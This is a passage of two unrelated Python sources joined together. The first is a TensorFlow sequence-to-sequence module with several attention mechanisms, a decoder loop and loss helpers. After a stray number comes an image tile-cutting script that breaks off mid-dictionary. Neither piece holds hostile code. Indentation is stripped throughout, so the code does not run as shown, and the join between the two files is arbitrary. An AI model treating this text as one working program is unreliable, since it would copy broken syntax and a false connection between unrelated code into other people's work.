indices = tf.stack([tf.range(batch_size), encoder_input_length_ - 1], axis=1)
last_forward = tf.gather_nd(encoder_outputs_[:, :, :encoder.cell_size], indices)
last_forward.set_shape([None, encoder.cell_size])
if encoder.final_state == 'concat_last': # concats last states of all backward layers (full LSTM states)
encoder_state_ = tf.concat(encoder_states_, axis=1)
elif encoder.final_state == 'average':
mask = tf.sequence_mask(encoder_input_length_, maxlen=tf.shape(encoder_outputs_)[1], dtype=tf.float32)
mask = tf.expand_dims(mask, axis=2)
encoder_state_ = tf.reduce_sum(mask * encoder_outputs_, axis=1) / tf.reduce_sum(mask, axis=1)
elif encoder.final_state == 'average_inputs':
mask = tf.sequence_mask(encoder_input_length_, maxlen=tf.shape(encoder_inputs_)[1], dtype=tf.float32)
mask = tf.expand_dims(mask, axis=2)
encoder_state_ = tf.reduce_sum(mask * encoder_inputs_, axis=1) / tf.reduce_sum(mask, axis=1)
elif encoder.bidir and encoder.final_state == 'last_both':
encoder_state_ = tf.concat([last_forward, last_backward], axis=1)
elif encoder.bidir and not encoder.final_state == 'last_forward': # last backward hidden state
encoder_state_ = last_backward
else: # last forward hidden state
encoder_state_ = last_forward
if encoder.bidir and encoder.bidir_projection:
encoder_outputs_ = dense(encoder_outputs_, encoder.cell_size, use_bias=False, name='bidir_projection')
encoder_outputs.append(encoder_outputs_)
encoder_states.append(encoder_state_)
new_encoder_input_length.append(encoder_input_length_)
encoder_state = tf.concat(encoder_states, 1)
return encoder_outputs, encoder_state, new_encoder_input_length
def compute_energy(hidden, state, attn_size, attn_keep_prob=None, pervasive_dropout=False, layer_norm=False,
mult_attn=False, **kwargs):
if attn_keep_prob is not None:
state_noise_shape = [1, tf.shape(state)[1]] if pervasive_dropout else None
state = tf.nn.dropout(state, keep_prob=attn_keep_prob, noise_shape=state_noise_shape)
hidden_noise_shape = [1, 1, tf.shape(hidden)[2]] if pervasive_dropout else None
hidden = tf.nn.dropout(hidden, keep_prob=attn_keep_prob, noise_shape=hidden_noise_shape)
if mult_attn:
state = dense(state, attn_size, use_bias=False, name='state')
hidden = dense(hidden, attn_size, use_bias=False, name='hidden')
return tf.einsum('ijk,ik->ij', hidden, state)
else:
y = dense(state, attn_size, use_bias=not layer_norm, name='W_a')
y = tf.expand_dims(y, axis=1)
if layer_norm:
y = tf.contrib.layers.layer_norm(y, scope='layer_norm_state')
hidden = tf.contrib.layers.layer_norm(hidden, center=False, scope='layer_norm_hidden')
f = dense(hidden, attn_size, use_bias=False, name='U_a')
v = get_variable('v_a', [attn_size])
s = f + y
return tf.reduce_sum(v * tf.tanh(s), axis=2)
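# In summary (matching the code above): mult_attn computes the multiplicative
# energy e_ij = (W_h h_j) . (W_s s), while the default branch computes the
# additive (Bahdanau-style) energy e_ij = v_a . tanh(W_a s + U_a h_j),
# optionally layer-normalizing both terms.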
def compute_energy_with_filter(hidden, state, prev_weights, attn_filters, attn_filter_length,
**kwargs):
hidden = tf.expand_dims(hidden, 2)
batch_size = tf.shape(hidden)[0]
time_steps = tf.shape(hidden)[1]
attn_size = hidden.get_shape()[3].value
filter_shape = [attn_filter_length * 2 + 1, 1, 1, attn_filters]
filter_ = get_variable('filter', filter_shape)
u = get_variable('U', [attn_filters, attn_size])
prev_weights = tf.reshape(prev_weights, tf.stack([batch_size, time_steps, 1, 1]))
conv = tf.nn.conv2d(prev_weights, filter_, [1, 1, 1, 1], 'SAME')
shape = tf.stack([tf.multiply(batch_size, time_steps), attn_filters])
conv = tf.reshape(conv, shape)
z = tf.matmul(conv, u)
z = tf.reshape(z, tf.stack([batch_size, time_steps, 1, attn_size]))
y = dense(state, attn_size, use_bias=True, name='y')
y = tf.reshape(y, [-1, 1, 1, attn_size])
k = get_variable('W', [attn_size, attn_size])
# dot product between tensors requires reshaping
hidden = tf.reshape(hidden, tf.stack([tf.multiply(batch_size, time_steps), attn_size]))
f = tf.matmul(hidden, k)
f = tf.reshape(f, tf.stack([batch_size, time_steps, 1, attn_size]))
v = get_variable('V', [attn_size])
s = f + y + z
return tf.reduce_sum(v * tf.tanh(s), [2, 3])
def global_attention(state, hidden_states, encoder, encoder_input_length, scope=None, context=None, **kwargs):
with tf.variable_scope(scope or 'attention_{}'.format(encoder.name)):
if context is not None and encoder.use_context:
state = tf.concat([state, context], axis=1)
if encoder.attn_filters:
e = compute_energy_with_filter(hidden_states, state, attn_size=encoder.attn_size,
attn_filters=encoder.attn_filters,
attn_filter_length=encoder.attn_filter_length, **kwargs)
else:
e = compute_energy(hidden_states, state, attn_size=encoder.attn_size,
attn_keep_prob=encoder.attn_keep_prob, pervasive_dropout=encoder.pervasive_dropout,
layer_norm=encoder.layer_norm, mult_attn=encoder.mult_attn, **kwargs)
e -= tf.reduce_max(e, axis=1, keep_dims=True)
mask = tf.sequence_mask(encoder_input_length, maxlen=tf.shape(hidden_states)[1], dtype=tf.float32)
T = encoder.attn_temperature or 1.0
exp = tf.exp(e / T) * mask
weights = exp / tf.reduce_sum(exp, axis=-1, keep_dims=True)
weighted_average = tf.reduce_sum(tf.expand_dims(weights, 2) * hidden_states, axis=1)
return weighted_average, weights
def no_attention(state, hidden_states, *args, **kwargs):
batch_size = tf.shape(state)[0]
weighted_average = tf.zeros(shape=tf.stack([batch_size, 0]))
weights = tf.zeros(shape=[batch_size, tf.shape(hidden_states)[1]])
return weighted_average, weights
def average_attention(hidden_states, encoder_input_length, *args, **kwargs):
# attention with fixed weights (average of all hidden states)
lengths = tf.to_float(tf.expand_dims(encoder_input_length, axis=1))
mask = tf.sequence_mask(encoder_input_length, maxlen=tf.shape(hidden_states)[1])
weights = tf.to_float(mask) / lengths
weighted_average = tf.reduce_sum(hidden_states * tf.expand_dims(weights, axis=2), axis=1)
return weighted_average, weights
def last_state_attention(hidden_states, encoder_input_length, *args, **kwargs):
weights = tf.one_hot(encoder_input_length - 1, tf.shape(hidden_states)[1])
weights = tf.to_float(weights)
weighted_average = tf.reduce_sum(hidden_states * tf.expand_dims(weights, axis=2), axis=1)
return weighted_average, weights
def local_attention(state, hidden_states, encoder, encoder_input_length, pos=None, scope=None,
context=None, **kwargs):
batch_size = tf.shape(state)[0]
attn_length = tf.shape(hidden_states)[1]
if context is not None and encoder.use_context:
state = tf.concat([state, context], axis=1)
state_size = state.get_shape()[1].value
with tf.variable_scope(scope or 'attention_{}'.format(encoder.name)):
encoder_input_length = tf.to_float(tf.expand_dims(encoder_input_length, axis=1))
if pos is not None:
pos = tf.reshape(pos, [-1, 1])
pos = tf.minimum(pos, encoder_input_length - 1)
if pos is not None and encoder.attn_window_size > 0:
# `pred_edits` scenario, where we know the aligned pos
# when the windows size is non-zero, we concatenate consecutive encoder states
# and map it to the right attention vector size.
weights = tf.to_float(tf.one_hot(tf.to_int32(tf.squeeze(pos, axis=1)), depth=attn_length))
weighted_average = []
for offset in range(-encoder.attn_window_size, encoder.attn_window_size + 1):
pos_ = pos + offset
pos_ = tf.minimum(pos_, encoder_input_length - 1)
pos_ = tf.maximum(pos_, 0) # TODO: when pos is < 0, use <S> or </S>
weights_ = tf.to_float(tf.one_hot(tf.to_int32(tf.squeeze(pos_, axis=1)), depth=attn_length))
weighted_average_ = tf.reduce_sum(tf.expand_dims(weights_, axis=2) * hidden_states, axis=1)
weighted_average.append(weighted_average_)
weighted_average = tf.concat(weighted_average, axis=1)
weighted_average = dense(weighted_average, encoder.attn_size)
elif pos is not None:
weights = tf.to_float(tf.one_hot(tf.to_int32(tf.squeeze(pos, axis=1)), depth=attn_length))
weighted_average = tf.reduce_sum(tf.expand_dims(weights, axis=2) * hidden_states, axis=1)
else:
# Local attention of Luong et al. (http://arxiv.org/abs/1508.04025)
wp = get_variable('Wp', [state_size, state_size])
vp = get_variable('vp', [state_size, 1])
pos = tf.nn.sigmoid(tf.matmul(tf.nn.tanh(tf.matmul(state, wp)), vp))
pos = tf.floor(encoder_input_length * pos)
pos = tf.reshape(pos, [-1, 1])
pos = tf.minimum(pos, encoder_input_length - 1)
idx = tf.tile(tf.to_float(tf.range(attn_length)), tf.stack([batch_size]))
idx = tf.reshape(idx, [-1, attn_length])
low = pos - encoder.attn_window_size
high = pos + encoder.attn_window_size
mlow = tf.to_float(idx < low)
mhigh = tf.to_float(idx > high)
m = mlow + mhigh
m += tf.to_float(idx >= encoder_input_length)
mask = tf.to_float(tf.equal(m, 0.0))
e = compute_energy(hidden_states, state, attn_size=encoder.attn_size, **kwargs)
weights = softmax(e, mask=mask)
sigma = encoder.attn_window_size / 2
numerator = -tf.pow((idx - pos), tf.convert_to_tensor(2, dtype=tf.float32))
div = tf.truediv(numerator, 2 * sigma ** 2)
weights *= tf.exp(div) # result of the truncated normal distribution
# normalize to keep a probability distribution
# weights /= (tf.reduce_sum(weights, axis=1, keep_dims=True) + 10e-12)
weighted_average = tf.reduce_sum(tf.expand_dims(weights, axis=2) * hidden_states, axis=1)
return weighted_average, weights
def attention(encoder, **kwargs):
attention_functions = {
'global': global_attention,
'local': local_attention,
'none': no_attention,
'average': average_attention,
'last_state': last_state_attention
}
attention_function = attention_functions.get(encoder.attention_type, global_attention)
return attention_function(encoder=encoder, **kwargs)
def multi_attention(state, hidden_states, encoders, encoder_input_length, pos=None, aggregation_method='sum',
prev_weights=None, **kwargs):
attns = []
weights = []
context_vector = None
for i, (hidden, encoder, input_length) in enumerate(zip(hidden_states, encoders, encoder_input_length)):
pos_ = pos[i] if pos is not None else None
prev_weights_ = prev_weights[i] if prev_weights is not None else None
hidden = beam_search.resize_like(hidden, state)
input_length = beam_search.resize_like(input_length, state)
context_vector, weights_ = attention(state=state, hidden_states=hidden, encoder=encoder,
encoder_input_length=input_length, pos=pos_, context=context_vector,
prev_weights=prev_weights_, **kwargs)
attns.append(context_vector)
weights.append(weights_)
if aggregation_method == 'sum':
context_vector = tf.reduce_sum(tf.stack(attns, axis=2), axis=2)
else:
context_vector = tf.concat(attns, axis=1)
return context_vector, weights
def attention_decoder(decoder_inputs, initial_state, attention_states, encoders, decoder, encoder_input_length,
feed_previous=0.0, align_encoder_id=0, feed_argmax=True, **kwargs):
"""
:param decoder_inputs: int32 tensor of shape (batch_size, output_length)
:param initial_state: initial state of the decoder (usually the final state of the encoder),
as a float32 tensor of shape (batch_size, initial_state_size). This state is mapped to the
correct state size for the decoder.
:param attention_states: list of tensors of shape (batch_size, input_length, encoder_cell_size),
the hidden states of the encoder(s) (one tensor for each encoder).
:param encoders: configuration of the encoders
:param decoder: configuration of the decoder
:param encoder_input_length: list of int32 tensors of shape (batch_size,), tells for each encoder,
the true length of each sequence in the batch (sequences in the same batch are padded to all have the same
length).
:param feed_previous: scalar tensor corresponding to the probability to use previous decoder output
instead of the ground truth as input for the decoder (1 when decoding, between 0 and 1 when training)
:param feed_argmax: boolean tensor, when True the greedy decoder outputs the word with the highest
probability (argmax). When False, it samples a word from the probability distribution (softmax).
:param align_encoder_id: outputs attention weights for this encoder. Also used when predicting edit operations
      (pred_edits), to specify which encoder reads the sequence to post-edit (MT).
:return:
outputs of the decoder as a tensor of shape (batch_size, output_length, decoder_cell_size)
attention weights as a tensor of shape (output_length, encoders, batch_size, input_length)
"""
assert not decoder.pred_maxout_layer or decoder.cell_size % 2 == 0, 'cell size must be a multiple of 2'
if decoder.use_lstm is False:
decoder.cell_type = 'GRU'
embedding_shape = [decoder.vocab_size, decoder.embedding_size]
if decoder.embedding_initializer == 'sqrt3':
initializer = tf.random_uniform_initializer(-math.sqrt(3), math.sqrt(3))
else:
initializer = None
device = '/cpu:0' if decoder.embeddings_on_cpu else None
with tf.device(device):
embedding = get_variable('embedding_{}'.format(decoder.name), shape=embedding_shape, initializer=initializer)
input_shape = tf.shape(decoder_inputs)
batch_size = input_shape[0]
time_steps = input_shape[1]
scope_name = 'decoder_{}'.format(decoder.name)
scope_name += '/' + '_'.join(encoder.name for encoder in encoders)
def embed(input_):
embedded_input = tf.nn.embedding_lookup(embedding, input_)
if decoder.use_dropout and decoder.word_keep_prob is not None:
noise_shape = [1, 1] if decoder.pervasive_dropout else [batch_size, 1]
embedded_input = tf.nn.dropout(embedded_input, keep_prob=decoder.word_keep_prob, noise_shape=noise_shape)
if decoder.use_dropout and decoder.embedding_keep_prob is not None:
size = tf.shape(embedded_input)[1]
noise_shape = [1, size] if decoder.pervasive_dropout else [batch_size, size]
embedded_input = tf.nn.dropout(embedded_input, keep_prob=decoder.embedding_keep_prob,
noise_shape=noise_shape)
return embedded_input
def get_cell(input_size=None, reuse=False):
cells = []
for j in range(decoder.layers):
input_size_ = input_size if j == 0 else decoder.cell_size
if decoder.cell_type.lower() == 'lstm':
cell = CellWrapper(BasicLSTMCell(decoder.cell_size, reuse=reuse))
elif decoder.cell_type.lower() == 'dropoutgru':
cell = DropoutGRUCell(decoder.cell_size, reuse=reuse, layer_norm=decoder.layer_norm,
input_size=input_size_, input_keep_prob=decoder.rnn_input_keep_prob,
state_keep_prob=decoder.rnn_state_keep_prob)
else:
cell = GRUCell(decoder.cell_size, reuse=reuse, layer_norm=decoder.layer_norm)
if decoder.use_dropout and decoder.cell_type.lower() != 'dropoutgru':
cell = DropoutWrapper(cell, input_keep_prob=decoder.rnn_input_keep_prob,
output_keep_prob=decoder.rnn_output_keep_prob,
state_keep_prob=decoder.rnn_state_keep_prob,
variational_recurrent=decoder.pervasive_dropout,
dtype=tf.float32, input_size=input_size_)
cells.append(cell)
if len(cells) == 1:
return cells[0]
else:
return CellWrapper(MultiRNNCell(cells))
def look(state, input_, prev_weights=None, pos=None):
prev_weights_ = [prev_weights if i == align_encoder_id else None for i in range(len(encoders))]
pos_ = None
if decoder.pred_edits:
pos_ = [pos if i == align_encoder_id else None for i in range(len(encoders))]
if decoder.attn_prev_word:
state = tf.concat([state, input_], axis=1)
parameters = dict(hidden_states=attention_states, encoder_input_length=encoder_input_length,
encoders=encoders, aggregation_method=decoder.aggregation_method)
context, new_weights = multi_attention(state, pos=pos_, prev_weights=prev_weights_, **parameters)
if decoder.context_mapping:
with tf.variable_scope(scope_name):
activation = tf.nn.tanh if decoder.context_mapping_activation == 'tanh' else None
use_bias = not decoder.context_mapping_no_bias
context = dense(context, decoder.context_mapping, use_bias=use_bias, activation=activation,
name='context_mapping')
return context, new_weights[align_encoder_id]
def update(state, input_, context=None, symbol=None):
if context is not None and decoder.rnn_feed_attn:
input_ = tf.concat([input_, context], axis=1)
input_size = input_.get_shape()[1].value
initializer = CellInitializer(decoder.cell_size) if decoder.orthogonal_init else None
with tf.variable_scope(tf.get_variable_scope(), initializer=initializer):
try:
output, new_state = get_cell(input_size)(input_, state)
except ValueError: # auto_reuse doesn't work with LSTM cells
output, new_state = get_cell(input_size, reuse=True)(input_, state)
if decoder.skip_update and decoder.pred_edits and symbol is not None:
is_del = tf.equal(symbol, utils.DEL_ID)
new_state = tf.where(is_del, state, new_state)
if decoder.cell_type.lower() == 'lstm' and decoder.use_lstm_full_state:
output = new_state
return output, new_state
def update_pos(pos, symbol, max_pos=None):
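        # in the pred_edits setting the decoder emits edit operations: the source
        # position advances on KEEP and DEL only (INS consumes no source token),
        # and is capped at the source sequence length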
if not decoder.pred_edits:
return pos
is_keep = tf.equal(symbol, utils.KEEP_ID)
is_del = tf.equal(symbol, utils.DEL_ID)
is_not_ins = tf.logical_or(is_keep, is_del)
pos = beam_search.resize_like(pos, symbol)
max_pos = beam_search.resize_like(max_pos, symbol)
pos += tf.to_float(is_not_ins)
if max_pos is not None:
pos = tf.minimum(pos, tf.to_float(max_pos))
return pos
def generate(state, input_, context):
if decoder.pred_use_lstm_state is False: # for back-compatibility
state = state[:,-decoder.cell_size:]
projection_input = [state, context]
if decoder.use_previous_word:
projection_input.insert(1, input_) # for back-compatibility
output_ = tf.concat(projection_input, axis=1)
if decoder.pred_deep_layer:
deep_layer_size = decoder.pred_deep_layer_size or decoder.embedding_size
if decoder.layer_norm:
output_ = dense(output_, deep_layer_size, use_bias=False, name='deep_output')
output_ = tf.contrib.layers.layer_norm(output_, activation_fn=tf.nn.tanh, scope='output_layer_norm')
else:
output_ = dense(output_, deep_layer_size, activation=tf.tanh, use_bias=True, name='deep_output')
if decoder.use_dropout:
size = tf.shape(output_)[1]
noise_shape = [1, size] if decoder.pervasive_dropout else None
output_ = tf.nn.dropout(output_, keep_prob=decoder.deep_layer_keep_prob, noise_shape=noise_shape)
else:
if decoder.pred_maxout_layer:
maxout_size = decoder.maxout_size or decoder.cell_size
output_ = dense(output_, maxout_size, use_bias=True, name='maxout')
if decoder.old_maxout: # for back-compatibility with old models
output_ = tf.nn.pool(tf.expand_dims(output_, axis=2), window_shape=[2], pooling_type='MAX',
padding='SAME', strides=[2])
output_ = tf.squeeze(output_, axis=2)
else:
output_ = tf.maximum(*tf.split(output_, num_or_size_splits=2, axis=1))
if decoder.pred_embed_proj:
# intermediate projection to embedding size (before projecting to vocabulary size)
# this is useful to reduce the number of parameters, and
# to use the output embeddings for output projection (tie_embeddings parameter)
output_ = dense(output_, decoder.embedding_size, use_bias=False, name='softmax0')
if decoder.tie_embeddings and (decoder.pred_embed_proj or decoder.pred_deep_layer):
bias = get_variable('softmax1/bias', shape=[decoder.vocab_size])
output_ = tf.matmul(output_, tf.transpose(embedding)) + bias
else:
output_ = dense(output_, decoder.vocab_size, use_bias=True, name='softmax1')
return output_
state_size = (decoder.cell_size * 2 if decoder.cell_type.lower() == 'lstm' else decoder.cell_size) * decoder.layers
if decoder.use_dropout:
initial_state = tf.nn.dropout(initial_state, keep_prob=decoder.initial_state_keep_prob)
with tf.variable_scope(scope_name):
if decoder.layer_norm:
initial_state = dense(initial_state, state_size, use_bias=False, name='initial_state_projection')
initial_state = tf.contrib.layers.layer_norm(initial_state, activation_fn=tf.nn.tanh,
scope='initial_state_layer_norm')
else:
initial_state = dense(initial_state, state_size, use_bias=True, name='initial_state_projection',
activation=tf.nn.tanh)
if decoder.cell_type.lower() == 'lstm' and decoder.use_lstm_full_state:
initial_output = initial_state
else:
initial_output = initial_state[:, -decoder.cell_size:]
time = tf.constant(0, dtype=tf.int32, name='time')
outputs = tf.TensorArray(dtype=tf.float32, size=time_steps)
samples = tf.TensorArray(dtype=tf.int64, size=time_steps)
inputs = tf.TensorArray(dtype=tf.int64, size=time_steps).unstack(tf.to_int64(tf.transpose(decoder_inputs)))
states = tf.TensorArray(dtype=tf.float32, size=time_steps)
weights = tf.TensorArray(dtype=tf.float32, size=time_steps)
attns = tf.TensorArray(dtype=tf.float32, size=time_steps)
initial_symbol = inputs.read(0) # first symbol is BOS
initial_input = embed(initial_symbol)
initial_pos = tf.zeros([batch_size], tf.float32)
initial_weights = tf.zeros(tf.shape(attention_states[align_encoder_id])[:2])
initial_context, _ = look(initial_output, initial_input, pos=initial_pos, prev_weights=initial_weights)
initial_data = tf.concat([initial_state, initial_context, tf.expand_dims(initial_pos, axis=1), initial_weights],
axis=1)
context_size = initial_context.shape[1].value
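    # initial_data packs everything beam search must carry per hypothesis into
    # one flat tensor: [cell state | attention context | position | attention
    # weights]; get_logits below splits it apart again with the matching sizes.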
def get_logits(state, ids, time): # for beam-search decoding
with tf.variable_scope('decoder_{}'.format(decoder.name)):
state, context, pos, prev_weights = tf.split(state, [state_size, context_size, 1, -1], axis=1)
input_ = embed(ids)
pos = tf.squeeze(pos, axis=1)
pos = tf.cond(tf.equal(time, 0),
lambda: pos,
lambda: update_pos(pos, ids, encoder_input_length[align_encoder_id]))
if decoder.cell_type.lower() == 'lstm' and decoder.use_lstm_full_state:
output = state
else:
# output is always the right-most part of state. However, this only works at test time,
# because different dropout operations can be used on state and output.
output = state[:, -decoder.cell_size:]
if decoder.conditional_rnn:
with tf.variable_scope('conditional_1'):
output, state = update(state, input_)
elif decoder.update_first:
output, state = update(state, input_, None, ids)
elif decoder.generate_first:
output, state = tf.cond(tf.equal(time, 0),
lambda: (output, state),
lambda: update(state, input_, context, ids))
context, new_weights = look(output, input_, pos=pos, prev_weights=prev_weights)
if decoder.conditional_rnn:
with tf.variable_scope('conditional_2'):
output, state = update(state, context)
elif not decoder.generate_first:
output, state = update(state, input_, context, ids)
logits = generate(output, input_, context)
pos = tf.expand_dims(pos, axis=1)
state = tf.concat([state, context, pos, new_weights], axis=1)
return state, logits
def _time_step(time, input_, input_symbol, pos, state, output, outputs, states, weights, attns, prev_weights,
samples):
if decoder.conditional_rnn:
with tf.variable_scope('conditional_1'):
output, state = update(state, input_)
elif decoder.update_first:
output, state = update(state, input_, None, input_symbol)
context, new_weights = look(output, input_, pos=pos, prev_weights=prev_weights)
if decoder.conditional_rnn:
with tf.variable_scope('conditional_2'):
output, state = update(state, context)
elif not decoder.generate_first:
output, state = update(state, input_, context, input_symbol)
output_ = generate(output, input_, context)
argmax = lambda: tf.argmax(output_, 1)
target = lambda: inputs.read(time + 1)
softmax = lambda: tf.squeeze(tf.multinomial(tf.log(tf.nn.softmax(output_)), num_samples=1),
axis=1)
use_target = tf.logical_and(time < time_steps - 1, tf.random_uniform([]) >= feed_previous)
predicted_symbol = tf.case([
(use_target, target),
(tf.logical_not(feed_argmax), softmax)],
default=argmax) # default case is useful for beam-search
predicted_symbol.set_shape([None])
predicted_symbol = tf.stop_gradient(predicted_symbol)
samples = samples.write(time, predicted_symbol)
input_ = embed(predicted_symbol)
pos = update_pos(pos, predicted_symbol, encoder_input_length[align_encoder_id])
attns = attns.write(time, context)
weights = weights.write(time, new_weights)
states = states.write(time, state)
outputs = outputs.write(time, output_)
if not decoder.conditional_rnn and not decoder.update_first and decoder.generate_first:
output, state = update(state, input_, context, predicted_symbol)
return (time + 1, input_, predicted_symbol, pos, state, output, outputs, states, weights, attns, new_weights,
samples)
with tf.variable_scope('decoder_{}'.format(decoder.name)):
_, _, _, new_pos, new_state, _, outputs, states, weights, attns, new_weights, samples = tf.while_loop(
cond=lambda time, *_: time < time_steps,
body=_time_step,
            # order must match _time_step's signature (outputs, states, weights, attns)
            loop_vars=(time, initial_input, initial_symbol, initial_pos, initial_state, initial_output, outputs,
                       states, weights, attns, initial_weights, samples),
parallel_iterations=decoder.parallel_iterations,
swap_memory=decoder.swap_memory)
outputs = outputs.stack()
    weights = weights.stack()   # output time, batch size, input time (transposed to batch-major below)
states = states.stack()
attns = attns.stack()
samples = samples.stack()
# put batch_size as first dimension
outputs = tf.transpose(outputs, perm=(1, 0, 2))
weights = tf.transpose(weights, perm=(1, 0, 2))
states = tf.transpose(states, perm=(1, 0, 2))
attns = tf.transpose(attns, perm=(1, 0, 2))
samples = tf.transpose(samples)
return outputs, weights, states, attns, samples, get_logits, initial_data
def encoder_decoder(encoders, decoders, encoder_inputs, targets, feed_previous, align_encoder_id=0,
encoder_input_length=None, feed_argmax=True, **kwargs):
decoder = decoders[0]
targets = targets[0] # single decoder
if encoder_input_length is None:
encoder_input_length = []
for encoder_inputs_ in encoder_inputs:
weights = get_weights(encoder_inputs_, utils.EOS_ID, include_first_eos=True)
encoder_input_length.append(tf.to_int32(tf.reduce_sum(weights, axis=1)))
parameters = dict(encoders=encoders, decoder=decoder, encoder_inputs=encoder_inputs,
feed_argmax=feed_argmax)
target_weights = get_weights(targets[:, 1:], utils.EOS_ID, include_first_eos=True)
attention_states, encoder_state, encoder_input_length = multi_encoder(
encoder_input_length=encoder_input_length, **parameters)
outputs, attention_weights, _, _, samples, beam_fun, initial_data = attention_decoder(
attention_states=attention_states, initial_state=encoder_state, feed_previous=feed_previous,
decoder_inputs=targets[:, :-1], align_encoder_id=align_encoder_id, encoder_input_length=encoder_input_length,
**parameters
)
xent_loss = sequence_loss(logits=outputs, targets=targets[:, 1:], weights=target_weights)
losses = xent_loss
return losses, [outputs], encoder_state, attention_states, attention_weights, samples, beam_fun, initial_data
def chained_encoder_decoder(encoders, decoders, encoder_inputs, targets, feed_previous,
chaining_strategy=None, align_encoder_id=0, chaining_non_linearity=False,
chaining_loss_ratio=1.0, chaining_stop_gradient=False, **kwargs):
decoder = decoders[0]
targets = targets[0] # single decoder
assert len(encoders) == 2
encoder_input_length = []
input_weights = []
for encoder_inputs_ in encoder_inputs:
weights = get_weights(encoder_inputs_, utils.EOS_ID, include_first_eos=True)
input_weights.append(weights)
encoder_input_length.append(tf.to_int32(tf.reduce_sum(weights, axis=1)))
target_weights = get_weights(targets[:, 1:], utils.EOS_ID, include_first_eos=True)
parameters = dict(encoders=encoders[1:], decoder=encoders[0])
attention_states, encoder_state, encoder_input_length[1:] = multi_encoder(
encoder_inputs[1:], encoder_input_length=encoder_input_length[1:], **parameters)
decoder_inputs = encoder_inputs[0][:, :-1]
batch_size = tf.shape(decoder_inputs)[0]
pad = tf.ones(shape=tf.stack([batch_size, 1]), dtype=tf.int32) * utils.BOS_ID
decoder_inputs = tf.concat([pad, decoder_inputs], axis=1)
outputs, _, states, attns, _, _, _ = attention_decoder(
attention_states=attention_states, initial_state=encoder_state, decoder_inputs=decoder_inputs,
encoder_input_length=encoder_input_length[1:], **parameters
)
chaining_loss = sequence_loss(logits=outputs, targets=encoder_inputs[0], weights=input_weights[0])
if decoder.cell_type.lower() == 'lstm':
size = states.get_shape()[2].value
decoder_outputs = states[:, :, size // 2:]
else:
decoder_outputs = states
if chaining_strategy == 'share_states':
other_inputs = states
elif chaining_strategy == 'share_outputs':
other_inputs = decoder_outputs
else:
other_inputs = None
if other_inputs is not None and chaining_stop_gradient:
other_inputs = tf.stop_gradient(other_inputs)
parameters = dict(encoders=encoders[:1], decoder=decoder, encoder_inputs=encoder_inputs[:1],
other_inputs=other_inputs)
attention_states, encoder_state, encoder_input_length[:1] = multi_encoder(
encoder_input_length=encoder_input_length[:1], **parameters)
if chaining_stop_gradient:
attns = tf.stop_gradient(attns)
states = tf.stop_gradient(states)
decoder_outputs = tf.stop_gradient(decoder_outputs)
if chaining_strategy == 'concat_attns':
attention_states[0] = tf.concat([attention_states[0], attns], axis=2)
elif chaining_strategy == 'concat_states':
attention_states[0] = tf.concat([attention_states[0], states], axis=2)
elif chaining_strategy == 'sum_attns':
attention_states[0] += attns
elif chaining_strategy in ('map_attns', 'map_states', 'map_outputs'):
if chaining_strategy == 'map_attns':
x = attns
elif chaining_strategy == 'map_outputs':
x = decoder_outputs
else:
x = states
shape = [x.get_shape()[-1], attention_states[0].get_shape()[-1]]
w = tf.get_variable("map_attns/matrix", shape=shape)
b = tf.get_variable("map_attns/bias", shape=shape[-1:])
x = tf.einsum('ijk,kl->ijl', x, w) + b
if chaining_non_linearity:
x = tf.nn.tanh(x)
attention_states[0] += x
outputs, attention_weights, _, _, samples, beam_fun, initial_data = attention_decoder(
attention_states=attention_states, initial_state=encoder_state,
feed_previous=feed_previous, decoder_inputs=targets[:,:-1],
align_encoder_id=align_encoder_id, encoder_input_length=encoder_input_length[:1],
**parameters
)
xent_loss = sequence_loss(logits=outputs, targets=targets[:, 1:],
weights=target_weights)
if chaining_loss is not None and chaining_loss_ratio:
xent_loss += chaining_loss_ratio * chaining_loss
losses = [xent_loss, None, None]
return losses, [outputs], encoder_state, attention_states, attention_weights, samples, beam_fun, initial_data
def softmax(logits, dim=-1, mask=None):
e = tf.exp(logits)
if mask is not None:
e *= mask
return e / tf.clip_by_value(tf.reduce_sum(e, axis=dim, keep_dims=True), 10e-37, 10e+37)
def sequence_loss(logits, targets, weights, average_across_timesteps=False, average_across_batch=True):
batch_size = tf.shape(targets)[0]
time_steps = tf.shape(targets)[1]
logits_ = tf.reshape(logits, tf.stack([time_steps * batch_size, logits.get_shape()[2].value]))
targets_ = tf.reshape(targets, tf.stack([time_steps * batch_size]))
crossent = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits_, labels=targets_)
crossent = tf.reshape(crossent, tf.stack([batch_size, time_steps]))
log_perp = tf.reduce_sum(crossent * weights, axis=1)
if average_across_timesteps:
total_size = tf.reduce_sum(weights, axis=1)
total_size += 1e-12 # just to avoid division by 0 for all-0 weights
log_perp /= total_size
cost = tf.reduce_sum(log_perp)
if average_across_batch:
return cost / tf.to_float(batch_size)
else:
return cost
def get_weights(sequence, eos_id, include_first_eos=True):
cumsum = tf.cumsum(tf.to_float(tf.not_equal(sequence, eos_id)), axis=1)
range_ = tf.range(start=1, limit=tf.shape(sequence)[1] + 1)
range_ = tf.tile(tf.expand_dims(range_, axis=0), [tf.shape(sequence)[0], 1])
weights = tf.to_float(tf.equal(cumsum, tf.to_float(range_)))
if include_first_eos:
weights = weights[:,:-1]
shape = [tf.shape(weights)[0], 1]
weights = tf.concat([tf.ones(tf.stack(shape)), weights], axis=1)
return tf.stop_gradient(weights)
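# Illustrative note (not part of the original module): for a batch row
# [w1, w2, EOS, EOS] with include_first_eos=True, get_weights yields
# [1., 1., 1., 0.] -- ones up to and including the first EOS, zeros after.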
|
65838
|
import math, time, os, argparse, logging, json
from wand.image import Image
parser = argparse.ArgumentParser(
prog='tile_cutter',
description='Cuts large images into tiles.')
parser.add_argument('--tile-size', metavar='SIZE', type=int, default=512,
help='Tile size (width and height)')
parser.add_argument('-v', '--verbose', action='store_true',
help='Log debugging information')
parser.add_argument('image', type=argparse.FileType('rb'),
help='Source image')
args = parser.parse_args()
if args.verbose:
logging.basicConfig(level=logging.DEBUG)
else:
logging.basicConfig(level=logging.INFO)
layers = []
tile_size = args.tile_size
logging.info("tile size: %dx%d", tile_size, tile_size)
with Image(file=args.image) as source:
logging.info("image size: %dx%d", source.width, source.height)
# every zoom level has 2x more tiles
max_zoom = math.ceil(math.log(max(source.size) / args.tile_size, 2))
logging.info("zoom levels: 1-%d", max_zoom)
image_size = args.tile_size * (2 ** max_zoom)
offset_x, offset_y = tuple((image_size - orig) // 2 for orig in source.size)
logging.info("tiled size: %dx%d-%d-%d", image_size, image_size, offset_x, offset_y)
layers.append({
"name": "???",
"URL": os.path.basename(args.image.name),
"width": source.width,
"height": source.height,
"tileSize": args.tile_size,
